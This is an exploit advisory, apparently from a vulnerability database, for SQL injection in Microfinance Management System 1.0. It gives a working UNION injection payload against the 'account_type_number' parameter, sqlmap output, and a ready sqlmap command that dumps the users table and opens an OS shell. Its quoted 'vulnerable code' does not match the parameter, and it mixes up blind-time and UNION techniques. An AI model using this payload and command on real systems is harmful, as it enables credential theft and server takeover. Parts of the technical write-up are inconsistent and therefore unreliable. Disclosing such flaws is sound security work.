Microfinance Management System 1.0 SQL Injection

Credit: Hejap Zairy
Risk: Medium
Local: No
Remote: Yes

# Title: Microfinance Management System 1.0 SQLi To Rce # Author: Hejap Zairy # Date: 24.07.2022 # Vendor: https://www.sourcecodester.com/php/14822/microfinance-management-system.html # Software: https://www.sourcecodester.com/sites/default/files/download/oretnom23/mims_0.zip # Reference: https://github.com/Matrix07ksa # Tested on: Windows, MySQL, Apache #vulnerability Code php ```php <?php $sql = "SELECT count(*) AS total_account FROM account_type"; $result = mysqli_query($conn, $sql); $data = mysqli_fetch_assoc($result); ?> } ``` #Status: CRITICAL ``` GET parameter 'account_type_number' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y sqlmap identified the following injection point(s) with a total of 147 HTTP(s) requests: --- Parameter: account_type_number (GET) Type: UNION query Title: MySQL UNION query (random number) - 3 columns Payload: account_type_number=-6015' UNION ALL SELECT 7366,CONCAT(0x716b626b71,0x4268666c6b715274794a58534f487366546e5379414951584a684459764f424451536f5a707a6a6a,0x7170707a71),7366# --- ``` #SQLi Time to Rce #┘ĆExploit sqlmap -u 'http://0day.gov/mims/updateaccount_type.php?account_type_number=6015' --hex --time-sec=17 --dbms=mysql --technique=u --random-agent --eta -p account_type_number -D mims -T users --dump --os-shell # Description: The Blind Time SQLi vulnerability was converted to rce due to the permissions I have in the database and it was privesc # Proof and Exploit: https://i.imgur.com/kRcQmxO.png https://i.imgur.com/4RmKSom.png

Vote for this issue:


Thanks for you vote!


Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com


Back to Top